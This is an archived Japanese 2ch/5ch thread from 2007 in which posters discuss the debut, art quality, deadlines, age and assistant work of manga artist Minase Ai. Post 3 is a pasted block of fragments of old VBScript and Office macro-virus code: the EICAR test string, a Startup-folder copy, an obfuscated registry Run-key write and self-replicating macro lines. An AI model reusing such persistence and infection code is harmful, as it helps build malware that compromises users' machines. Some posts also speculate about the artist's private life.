5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【少コミ新人】水瀬藍【遂にデビュー】PART2

1 :.:2007/01/04(木) 15:34:36 ID:???O
立てました。マターリ語りましょう。

2 :花と名無しさん:2007/01/04(木) 16:11:27 ID:???0
◆前スレ
【少コミ新人】水瀬藍【遂にデビュー】
http://comic7.2ch.net/test/read.cgi/gcomic/1158598022/

◆作家本人ブログ「+うさぎと小鳥+」
ttp://minaseai.blog75.fc2.com/

◆関連スレッド・サイト
少女コミックは好きですか?Part20
http://comic7.2ch.net/test/read.cgi/gcomic/1161581330/

少コミねっと
ttp://www.sho-comi.com/

3 :花と名無しさん:2007/01/04(木) 16:22:12 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :花と名無しさん:2007/01/04(木) 16:25:21 ID:TXJADLcD0
>>1水瀬先生第2弾スレ発てましたな
やっぱ人気あるんだね水瀬先生は

5 :花と名無しさん:2007/01/04(木) 17:13:58 ID:???O
>>1


前スレ1000いくとは思わなかったw

6 :花と名無しさん:2007/01/04(木) 17:52:06 ID:???O
この人ありなっちのアシしてたあいにゃんだよね!?

7 :花と名無しさん:2007/01/04(木) 19:44:33 ID:???O
ナチアシ有名じゃんW  種の描く女の、怒り顔ヤバス‥少女漫画じゃない。ホラー入ってる。水瀬は描いてないけど‥

8 :花と名無しさん:2007/01/04(木) 22:41:36 ID:???0
>>1


困ってるみたいだから貼っておこうw
ttp://minaseai.blog75.fc2.com/?xml

9 :花と名無しさん:2007/01/04(木) 23:30:28 ID:???O
いい年して、あいにゃん‥三十路でしょこの人今年。希モスW

10 :花と名無しさん:2007/01/04(木) 23:30:32 ID:???0
1乙!激しくd!


11 :花と名無しさん:2007/01/04(木) 23:36:02 ID:???O
ナチはいくつお?(´∀`)

12 :花と名無しさん:2007/01/05(金) 00:18:43 ID:hcKmMQaX0
あと2ヶ月と7日で29だお!(^ω^)
序に武内先生もあと10ヶ月で29ですお(^ω^)

13 :花と名無しさん:2007/01/05(金) 00:20:55 ID:???0
あいにゃんはおいくつナノ?

14 :花と名無しさん:2007/01/05(金) 00:38:06 ID:hcKmMQaX0
>>13水瀬先生は種村先生より一歳上で今は29だけども…
あと4ヶ月(6月3日)で30だお(^ω^)

15 :花と名無しさん:2007/01/05(金) 00:56:20 ID:48NLdw+B0
種のアシやったせいで悪い影響受けてるお(^ω^)

16 :花と名無しさん:2007/01/05(金) 01:39:34 ID:???0
妙なアンチが張り付いてるけどW
別に種アシがコケても構いませんよWww

17 :花と名無しさん:2007/01/07(日) 00:13:07 ID:???O
コケル?

18 :花と名無しさん:2007/01/07(日) 17:33:27 ID:???O
>>17ヒットしないってことだろ。厨かよww

19 :花と名無しさん:2007/01/07(日) 18:30:19 ID:???O
水瀬のへったくそなCG見たか?
あんな雑な塗り方してるからアナログより早いんだろw

20 :花と名無しさん:2007/01/08(月) 16:01:08 ID:???0
あれって、オエビと何か違いはあるのか・・・?
はじめ見たときオエビかと思った。

21 :花と名無しさん:2007/01/08(月) 17:37:27 ID:???O
それほど雑なんだw
初心者が下書きからPC上でしようとするからああなる

22 :花と名無しさん:2007/01/10(水) 12:00:46 ID:???0
オエビなんじゃん。
そんなにへたくそかな。上手くはないけど。
短時間であれが描けるなんて、自分は羨ましく思うよ。

水瀬に足りないのは、時間をかけてやるという丁寧さだと思う。
まぁ少コミで時間かけるのは難しいかもだけどな

23 :花と名無しさん:2007/01/12(金) 16:24:56 ID:???0
http://kaoriha.org/nikki/archives/000417.html

24 :花と名無しさん:2007/01/12(金) 23:11:30 ID:xt8rx/zw0
躁躁躁躁躁■■▼躁躁躁躁躁躁▼■▼躁躁躁躁躁躁躁躁躁
躁躁躁躁▼■■躁躁躁躁躁躁躁■■▼躁躁躁躁躁躁躁躁躁
躁躁躁▼■■▼躁躁躁躁躁躁▼■■▼▼▼▼■■▼躁躁躁
躁躁躁■■■躁躁▼▼躁躁躁▼■■■■■■■■■▼躁躁
躁▼▼■■▼躁▼■■▼躁▼■■▼▼▼▼▼■■■躁躁躁
▼■■■■▼▼■■▼躁躁▼■■■躁躁躁▼■■▼躁躁躁
▼■■■■▼▼■▼躁躁▼■■▼■▼躁▼■■■躁躁躁躁
躁▼■■■■■■▼躁▼■■▼▼■■▼■■■▼躁躁躁躁
躁躁▼■■■■▼▼躁▼■▼躁躁▼■■■■▼躁躁躁躁躁
躁躁躁▼■■▼▼■▼躁▼躁躁躁躁▼■■■躁躁躁躁躁躁
躁躁躁▼■■躁躁■■▼躁躁躁躁躁▼■■▼▼躁躁躁躁躁
▼▼▼■■■▼■■■■▼躁躁▼▼■■■■■▼躁躁躁躁
■■■■■■■■▼■■▼▼■■■■▼■■■■■■▼▼
■■▼▼▼■■躁躁▼▼■■■■▼▼躁躁▼■■■■■▼
▼▼▼躁躁■■躁▼▼▼■■■▼▼■▼▼▼▼■■■■▼
躁■■■▼■■▼■■▼■■▼躁▼■■■■▼▼▼▼▼躁
躁■■■▼■■▼■■▼▼▼躁躁▼■■■■■■▼躁躁躁
躁■■■▼■■躁▼■■躁躁躁躁躁▼▼■■■■▼躁躁躁
▼■■■躁■■躁▼■■▼躁躁▼躁躁躁▼■■▼躁躁躁躁
▼■■■躁■■躁躁■■▼躁▼■■▼▼▼躁躁躁躁躁躁躁
▼■■▼躁■■躁躁■■▼躁▼■■■■■▼▼躁躁躁躁躁
▼■■▼躁■■躁躁▼▼躁躁▼■■■■■■■■▼▼躁躁
▼■■▼躁■■躁躁躁躁躁躁躁▼▼■■■■■■■▼躁躁
躁躁躁躁躁■■躁躁躁躁躁躁躁躁躁躁▼■■■■■▼躁躁
躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁

25 :花と名無しさん:2007/01/14(日) 08:15:40 ID:???O
少コミで時間は中々かけらんないでしょ‥実際3日位で仕上げた作品とかあるらしいし。新人にはハードだね。

26 :花と名無しさん:2007/01/14(日) 12:53:12 ID:???O
いやwww
月一本なのに3日しか作業できないのは有り得ないからwww
アシ雇えない新人が3日で作業できると思います(´∀`)?

27 :花と名無しさん:2007/01/14(日) 13:21:36 ID:4Upwf2oH0
>>26
性コミの中では3日くらいで
仕上げた作品があるって
>>25は言っているんじゃないの?
実際〆切3日前にやっと
ネームOKになる場面は、あそこじゃ
珍しくない。

28 :花と名無しさん:2007/01/14(日) 22:53:55 ID:???0
新人で5日で仕上げたのは聞いたことあるけど、3日もいたんだ…
確かにあそこでは、数日で仕上げなきゃないスケジュールは珍しくない。

29 :花と名無しさん:2007/01/14(日) 22:59:59 ID:???O
そんなギリギリまで頑張ってあのネームなんて悲し過ぎるなw
この作家には絵より話を頑張って欲しい。

30 :花と名無しさん:2007/01/15(月) 00:32:39 ID:???0
作画に取り掛かるのがぎりぎり(というかかなりデッド)なのは
一部編集に原因があるような気がするけど・・・投稿者スレ見てると

31 :花と名無しさん:2007/01/15(月) 10:52:53 ID:???0
自分の知ってる少コミ新人も3日であげてるっていってた
一人じゃ描けないからアシ雇って貧乏だって泣いてたよ

32 :花と名無しさん:2007/01/15(月) 15:34:01 ID:???O
その人知ってる。新人っつても本誌にたまに載せてるよね??

33 :花と名無しさん:2007/01/15(月) 17:14:00 ID:???O
新人だと漫画だけじゃ食べていけないし他の
仕事もしなきゃいけないだろうから私なら
3日なんて絶対無理だな。
少コミでデビューしたかったけどこれは考えものだぞ

34 :花と名無しさん:2007/01/15(月) 17:38:04 ID:???0
>>29

掲載が決まるのが締め切り何日前なのかにもよるよ
雑誌によっては会議で掲載が決まってから
締め切りまでが短い雑誌もある。

2ヶ月に一度の発行の雑誌でも
ネームから作画期間は2週間ってとこもあったし。
会議で通るまでは、プロットだけでボツの繰り返しだしね

まぁ、その短い時間で面白い話をかけなければプロじゃないけど。

35 :花と名無しさん:2007/01/15(月) 18:19:28 ID:???O
31>>咲坂?あゆみ?ってか実際漫画もネタはもう出つくしてるから、今の時代の漫画家は大変だよね。

36 :花と名無しさん:2007/01/19(金) 15:46:07 ID:???0
増刊明日だよな?
今日とか書いてたから公式まで確認する羽目に

37 :花と名無しさん:2007/01/19(金) 15:52:54 ID:???O
なんか今月は原稿してなさそうだね。日記とか見ても原稿で多忙そうな気配ないし。
食いモンのネタばっかww

38 :花と名無しさん:2007/01/19(金) 17:07:36 ID:???0
>>36
日記で訂正してたねw

39 :花と名無しさん:2007/01/20(土) 14:33:49 ID:???0
>>37
おからトリュフ甘そう
作ってみようかと

40 :花と名無しさん:2007/01/20(土) 16:54:32 ID:???0
おからトリュフ、作ったけど美味かったよ
食感も好みだった


41 :花と名無しさん:2007/01/20(土) 17:07:22 ID:???O
増刊発売日なのに、新作の話よりもおからトリュフで盛り上がってるってw

42 :花と名無しさん:2007/01/21(日) 13:24:44 ID:???O
増刊のサイズが本誌の大きさになってた!が‥水瀬さん全然目立たなかった。カラー扉絵だけ良かった‥

43 :花と名無しさん:2007/01/21(日) 15:04:34 ID:???O
カラーは私も好きだし上手いと思う。
漫画は…水瀬は絵がウリで話は元々ヒドいと思ってたが、その絵すら大変そうだった。
無意味に(水瀬的には意味を書いてるのかもしれんが)
主人公がモテる所はナチの影響なのかね。

44 :花と名無しさん:2007/01/21(日) 18:06:52 ID:???O
確か今回のはナチが手伝いに行ってるよね。

しかしだんだん絵が崩れて来ているよね…今となればデブー作が絵は一番マトモだった。
この人は連載じゃなくて読み切り中心じゃないとやっていけないだろうな、話の内容自体がまずgdgdだし。

45 :花と名無しさん:2007/01/23(火) 16:00:28 ID:???O
デブーが早過ぎたか、才能が足りないか‥。どちらにしてもデブーしちゃったんだからもう遅い。

46 :花と名無しさん:2007/01/23(火) 19:54:22 ID:???O
デブーが早すぎたというか、前にも散々言われてたけど皆瀬はそのままアシと同人してたほうが良かった様な気がする。
今までロクに投稿もせずに、5年ぶりくらいにたまたま投稿したのが当たったってデブーしちゃった感じだから余計に。
常に投稿を頑張ってて賞も取っていたとかならまだ頑張れって思えるけど。
とりあえずプロになったんだから、自分の個性を出していかないとね…ナチの二番煎じじゃなくて。

47 :花と名無しさん:2007/01/24(水) 00:36:46 ID:???0
早すぎたっていうか年齢的にこれが最大限なら、漫画家自体が既に無理なのかもw
個性も出しているつもりなのかもしれないけど、その個性がアシやっていたことによって
かなりナチに近いんだろうね(作画レベルとかは別として)
有名作家のアシになるって善し悪しかもなー

48 :花と名無しさん:2007/01/24(水) 00:50:29 ID:???0
テヌスの王子様作者と同じで、上辺だけ上手い人のを真似してるから
表面良く見えても全体的にデッサンおかしいし、下手なんだよ。
若い子がデビューしてぐんぐん上手くなってくような成長は
多分年齢的にいって無理だと思うし難しいと思う。
前に少込みで同人上がりの人が何回か短期連載したけど
結局同人に戻って行ったるし、プロで持続するのは厳しいんだね。

49 :花と名無しさん:2007/01/24(水) 04:38:32 ID:???0
年末の日記で、夢は諦めなければ叶うんですねとか凄く良い事書いてて、
それは確かに心から同意なんだけど
初投稿デブーの水瀬さんが言っても説得力ないな・・と正直思ってしまった。
これが「何度も投稿してついに!」という人が言えば頷けたのだが。
夢は諦めなければって、ずっと投稿もせず同人一本だったじゃないかと。(あとアシ)

そういう意味で、水瀬さん好きだったけどどうせならずっと同人で行くか、
早くから投稿して頑張ってて欲しかったな。

50 :花と名無しさん:2007/01/24(水) 09:00:48 ID:???O
>>46に禿しく同意。

51 :花と名無しさん:2007/01/24(水) 11:46:32 ID:???O
可哀想だけど話の練り方を知らないんだよね…
同人作家にありがちで、読者の目線で
「果たしてこの話は面白いか」
を考えずに独りよがりで間に合わせで話をあげちゃう
これは初期のナチはうまかった
いやナチも考えずに描いてたのがたまたま面白かっただけかもしれんがw

あ〜この人楽しんで描いてないだろうなってのがスゴイ判る

52 :花と名無しさん:2007/01/24(水) 12:39:42 ID:???O
本人は楽しく描いてんじゃないの?ただ読者には伝わらなくてポカーンなだけで。
数本読んだが、どの主人公も総じて性格良いとは思えなかった。
リアには人気みたいだが…カラー絵は好きだ。

53 :花と名無しさん:2007/01/24(水) 12:55:58 ID:???0
>>46
擁護のつもりで考えてみた。

水瀬が投稿しなくなった時期と父親が亡くなった時期が同じだから
生活の為にアシを辞められず、アシを辞めなければナチ同人も辞められずで
ストレスの発散からコナン同人始めてあんなブログを書いてたとか…
ナチアシってブログ見てると、休みはあまり無さそうだし…。

いま自分も事情があって数年投稿出来ないから、投稿しない人を一概に責められない
漫画描く人なら、人のアシより自分の漫画を描きたいはずだし。
なんか理由があったのでは。とか思っちゃうよ。

54 :花と名無しさん:2007/01/24(水) 13:14:39 ID:???0
じゃあ同人は辞めてもよかったんじゃないの
生活の為にアシはするにしても
アシしながら同人する暇があったなら、時間を見つけて投稿も出来ると思うけど…
どうしても同人>投稿だったように感じてしまう

55 :花と名無しさん:2007/01/24(水) 15:02:02 ID:???0
同人ではぼったくりだったもんね。紙袋ですら売ってたような
まあ生活のためだったらナチに気に入られてアシと同人で
稼いだ方がいつ切られるかわからない自分の漫画より安定してるな
(一般的に見ればそれも不安定だが)

どっちにしろプライベートで忙しくたって投稿漫画は描けるんだから
本人の怠慢だっただろうとは思う

まあ過去はどうあれデビューしているわけだから、これからのことを
話しましょうやと仕切ってみるテスツ

56 :花と名無しさん:2007/01/24(水) 16:28:31 ID:???O
ミナセだったかアサノだったか、「同人は金もうけの道具」と発言したのは事実。

今日読み切り立ち読みしてきた。絵、へたになったね。
カラーは好きだな〜と思ったけど、右下のは何?かばん?

57 :花と名無しさん:2007/01/24(水) 16:40:57 ID:???O
どっちが言ったかもハッキリしないのに事実はないだろw
お前が本人から聞いたのか?
あまり2ちゃんに踊らされるなよ。

>>49
激しく同意

58 :花と名無しさん:2007/01/24(水) 18:56:13 ID:???O
コナソ同人は、草薙と友達になるために始めたと思ってたよ

59 :花と名無しさん:2007/01/24(水) 22:16:15 ID:wN6shZXcO
>>57
うん、本人から聞いた。
だけどその当時、どっちがどっちか区別ついてなくてさ………
>>58
合ってますよ

60 :花と名無しさん:2007/01/24(水) 22:49:35 ID:???O
>>58-59
そんな、友達になろうと思って本当に簡単になれたら、誰も苦労しないだろうw
草薙は、さおりんの紹介とか、そんなんじゃないの?

61 :花と名無しさん:2007/01/24(水) 23:47:48 ID:Uy2QWtnp0
何か最近の水瀬先生は…種村先生の専アシで忙しくて、少コミで漫画を描く所じゃないンだろうね。

62 :花と名無しさん:2007/01/24(水) 23:50:05 ID:???0
友達になりたくて同人始めたとしても
悪い事じゃないだろ。

63 :花と名無しさん:2007/01/24(水) 23:55:35 ID:???O
ミナセてナチのアシはデブー決定と共に辞めてるよね。アシ復帰したの?

64 :花と名無しさん:2007/01/25(木) 00:05:32 ID:2sWmXHtq0
>>63水瀬先生は既に少コミでデビューしてるからね。
原稿に手に追えず状態って時に種村先生から急に呼び出されて、いち専アシ助けに則って雇われたンでないの?
ともなれば派遣扱いとしてやってることにもなり得るし。

65 :花と名無しさん:2007/01/25(木) 01:03:36 ID:???O
私生活はしらんが、東京で一人暮らしして、デビューしたてのやつがそれだけで食っていけるとは思えない。
ナチのとこも人出不足だろうし、もちつもたれつ、切っても切れない縁なのでは?
そもそも友達同士だったとして、雇用関係、金銭がからんでなお、友情は成立するのかな? 
ナチの場合。

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)